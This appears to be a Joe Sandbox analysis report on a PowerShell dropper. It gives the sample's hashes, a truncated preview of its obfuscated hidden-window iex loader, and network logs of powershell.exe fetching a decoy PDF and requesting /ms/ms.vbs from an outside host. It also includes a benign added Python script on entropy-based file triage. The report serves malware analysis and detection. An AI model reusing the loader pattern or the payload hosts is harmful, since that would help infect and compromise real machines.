                                                                                          Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T
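Added example, not part of the Joe Sandbox report: a short Python script that recomputes the "Entropy (8bit)" column used in the dropped-file records above and shows why the gzip streams written by AcroCEF.exe score around 7.97 while still being listed as Encrypted:false, whereas the 60-byte AppLocker probe text scores about 4.04. Compressed data and encrypted data are indistinguishable by entropy alone; what separates them in triage is whether a known container header explains the high entropy. All inputs are constructed (the probe text is copied from the preview and is 59 bytes because the 60th byte is not visible; the gzip, PDF and unknown blobs are synthetic), and the 7.5 cut-off and the signature list are this example's assumptions, not the sandbox's own logic.

```python
import gzip
import math
import random
from collections import Counter


def _pseudo_random(seed, n):
    """Deterministic pseudo-random bytes so the constructed samples are reproducible."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed inputs. The probe text is the preview of the 60-byte dropped files above
# (59 bytes here, the final byte is not shown); the others stand in for the gzip and PDF
# records and for a blob with no recognisable container.
APPLOCKER_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode"
RANDOM_GZIP = gzip.compress(_pseudo_random(0, 16384))                  # incompressible payload, gzip container
FAKE_PDF = b"%PDF-1.7\n" + gzip.compress(_pseudo_random(2, 4096))     # deflate-heavy PDF look-alike
RANDOM_UNKNOWN = b"\xff" + _pseudo_random(1, 4095)                     # high entropy, no header


def shannon_entropy(data):
    """Byte-level Shannon entropy in bits per byte (0.0 to 8.0), the quantity the
    report's "Entropy (8bit)" column shows."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Container signatures for the file types that occur in the dropped-file list.
_MAGIC = (
    (b"\x1f\x8b", "gzip"),
    (b"%PDF", "pdf"),
)


def classify(data, high_entropy=7.5):
    """Triage label for a dropped file. A recognised compressed container explains a
    near-8 entropy; only high entropy without such a container earns the
    encrypted-or-packed suspicion. The 7.5 cut-off is this example's assumption."""
    for magic, label in _MAGIC:
        if data.startswith(magic):
            return label
    if shannon_entropy(data) >= high_entropy:
        return "high-entropy-unknown"
    return "text-or-structured"


if __name__ == "__main__":
    samples = [("applocker probe", APPLOCKER_PROBE), ("gzip", RANDOM_GZIP),
               ("pdf", FAKE_PDF), ("unknown blob", RANDOM_UNKNOWN)]
    for name, blob in samples:
        print(f"{name:16s} entropy={shannon_entropy(blob):.3f} class={classify(blob)}")
```

The probe text comes out near 4.06 bits per byte (the report's 4.0389 is for the full 60-byte file), the gzip stream above 7.9, and only the header-less random blob is flagged; that is the distinction to keep in mind when a dropped-file record combines a 7.9+ entropy with Encrypted:false.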
                                                                                          File type:ASCII text, with very long lines (841), with no line terminators
                                                                                          Entropy (8bit):5.330940588667174
                                                                                          TrID:
                                                                                            File name:KcKtHBkskI.ps1
                                                                                            File size:841 bytes
                                                                                            MD5:2ba11b739c9f9a18f60a2ada78e3bc41
                                                                                            SHA1:48fe4ec641ea47e5fe34cbf27dce776deabce03f
                                                                                            SHA256:7883e31a07c25e30851390471a8d97e172ec6ec1ec98f49813d166f71cb819a1
                                                                                            SHA512:1d29f6aae05a8e3f85e00a8132fa84fd07d87ecb468fbe5a2f6bbc1bc57f9c48a3f8987acfe59c8fcbae3d007a8504b167633db13e1db8596f7eee9b1bb3d4e1
                                                                                            SSDEEP:24:X1UsIHs0TejWILFWLVjWvQWAa6Kz06vhCDzo2G:4ziKIpiq2Kz0ohCor
                                                                                            TLSH:5F012F895BC721F756A0F91014C84E3B323AC116A2E514B2BEB4822710ACF3C0E8296A
                                                                                            File Content Preview:powershell -win hidden $p57vcf=iex($('[Environment]::GetEmwms'''.Replace('mwm','nvironmentVariable(''public'') + ''\\idj34h.vb')));$flol=iex($('[Environment]::GetEmwms'''.Replace('mwm','nvironmentVariable(''public'') + ''\\npq.vb')));function getit([strin
                                                                                            Icon Hash:3270d6baae77db44
TCP packets (Timestamp    Source Port    Dest Port    Source IP    Dest IP)
                                                                                            Dec 19, 2024 12:48:26.015475988 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.015482903 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.015558958 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.021282911 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.021297932 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.023406982 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.023413897 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.023498058 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.166992903 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.167059898 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.167095900 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.167124987 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.167157888 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.167198896 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.173934937 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.173986912 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.174026012 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.174052954 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.174081087 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.174101114 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.180879116 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.180932999 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.180983067 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.180999041 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.181041956 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.181073904 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.186587095 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.186631918 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.186670065 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.186688900 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.186722040 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.186743021 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.193176985 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.193255901 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.193298101 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.193316936 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.193366051 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.193408966 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.199671030 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.199723959 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.199765921 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.199785948 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.199831009 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.199860096 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.206687927 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.206734896 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.206773043 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.206790924 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.206828117 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.206860065 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.213968992 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.214029074 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.214047909 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.214066982 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.214106083 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.214128971 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.358021975 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.358088017 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.358129025 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.358139038 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.358200073 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.364504099 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.364553928 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.364586115 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.364597082 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.364650011 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.371514082 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.371562004 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.371597052 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.371607065 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.371660948 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.378818035 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.378868103 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.378906012 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.378915071 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.378998041 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.385343075 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.385365963 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.385412931 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.385420084 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.385477066 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.392693996 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.392712116 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.392782927 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.392793894 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.392852068 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.398932934 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.398953915 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.399018049 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.399028063 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.399070978 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.406011105 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.406034946 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.406105042 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.406116962 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.406169891 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.545116901 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.545192003 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.545196056 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.545257092 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.547899008 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.837202072 CET4970380192.168.2.7203.175.174.69
                                                                                            Dec 19, 2024 12:48:26.957345963 CET8049703203.175.174.69192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.957449913 CET4970380192.168.2.7203.175.174.69
                                                                                            Dec 19, 2024 12:48:26.957551956 CET4970380192.168.2.7203.175.174.69
                                                                                            Dec 19, 2024 12:48:27.077528954 CET8049703203.175.174.69192.168.2.7
                                                                                            Dec 19, 2024 12:48:28.492311001 CET8049703203.175.174.69192.168.2.7
                                                                                            Dec 19, 2024 12:48:28.541239977 CET4970380192.168.2.7203.175.174.69
                                                                                            Dec 19, 2024 12:48:29.194247007 CET4970380192.168.2.7203.175.174.69
                                                                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                             Dec 19, 2024 12:48:22.963988066 CET | 56841 | 53 | 192.168.2.7 | 1.1.1.1
                                                                                             Dec 19, 2024 12:48:23.101795912 CET | 53 | 56841 | 1.1.1.1 | 192.168.2.7
                                                                                             Dec 19, 2024 12:48:26.693870068 CET | 53940 | 53 | 192.168.2.7 | 1.1.1.1
                                                                                             Dec 19, 2024 12:48:26.831950903 CET | 53 | 53940 | 1.1.1.1 | 192.168.2.7
                                                                                             Dec 19, 2024 12:48:41.235964060 CET | 63088 | 53 | 192.168.2.7 | 1.1.1.1
                                                                                             Dec 19, 2024 12:49:04.603641033 CET | 64430 | 53 | 192.168.2.7 | 1.1.1.1
                                                                                             Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                             Dec 19, 2024 12:48:22.963988066 CET | 192.168.2.7 | 1.1.1.1 | 0x450 | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:26.693870068 CET | 192.168.2.7 | 1.1.1.1 | 0x204b | Standard query (0) | www.bluemaxxlaser.com | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:41.235964060 CET | 192.168.2.7 | 1.1.1.1 | 0x89cb | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:49:04.603641033 CET | 192.168.2.7 | 1.1.1.1 | 0x6ddb | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
                                                                                             Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                             Dec 19, 2024 12:48:23.101795912 CET | 1.1.1.1 | 192.168.2.7 | 0x450 | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:23.101795912 CET | 1.1.1.1 | 192.168.2.7 | 0x450 | No error (0) | astenterprises.com.pk |  | 107.161.23.150 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:26.831950903 CET | 1.1.1.1 | 192.168.2.7 | 0x204b | No error (0) | www.bluemaxxlaser.com |  | 203.175.174.69 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:34.769428015 CET | 1.1.1.1 | 192.168.2.7 | 0x403f | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:34.769428015 CET | 1.1.1.1 | 192.168.2.7 | 0x403f | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.100 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:34.769428015 CET | 1.1.1.1 | 192.168.2.7 | 0x403f | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.98 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:34.769428015 CET | 1.1.1.1 | 192.168.2.7 | 0x403f | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.99 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:34.769428015 CET | 1.1.1.1 | 192.168.2.7 | 0x403f | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.58.101 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:48:41.467456102 CET | 1.1.1.1 | 192.168.2.7 | 0x89cb | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:49:04.919697046 CET | 1.1.1.1 | 192.168.2.7 | 0x6ddb | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:49:16.706294060 CET | 1.1.1.1 | 192.168.2.7 | 0xa514 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:49:16.706294060 CET | 1.1.1.1 | 192.168.2.7 | 0xa514 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:49:40.820089102 CET | 1.1.1.1 | 192.168.2.7 | 0xa21a | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:49:40.820089102 CET | 1.1.1.1 | 192.168.2.7 | 0xa21a | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:50:05.117175102 CET | 1.1.1.1 | 192.168.2.7 | 0x2df9 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                                                             Dec 19, 2024 12:50:05.117175102 CET | 1.1.1.1 | 192.168.2.7 | 0x2df9 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                                            • www.astenterprises.com.pk
                                                                                            • www.bluemaxxlaser.com
                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                             0 | 192.168.2.7 | 49703 | 203.175.174.69 | 80 | 7272 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                             Dec 19, 2024 12:48:26.957551956 CET | 80 | OUT | GET /ms/ms.vbs HTTP/1.1
                                                                                            Host: www.bluemaxxlaser.com
                                                                                            Connection: Keep-Alive
                                                                                             Dec 19, 2024 12:48:28.492311001 CET | 516 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 19 Dec 2024 11:48:28 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 315
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                             0 | 192.168.2.7 | 49701 | 107.161.23.150 | 443 | 7272 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                             2024-12-19 11:48:24 UTC | 127 | OUT | GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                            Host: www.astenterprises.com.pk
                                                                                            Connection: Keep-Alive
                                                                                             2024-12-19 11:48:24 UTC | 217 | IN | HTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            content-type: application/pdf
                                                                                            last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                            accept-ranges: bytes
                                                                                            content-length: 871324
                                                                                            date: Thu, 19 Dec 2024 11:48:24 GMT
                                                                                            server: LiteSpeed
                                                                                             2024-12-19 11:48:24 UTC | 16384 | IN
                                                                                            Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                            Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                            Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                            Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                            Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
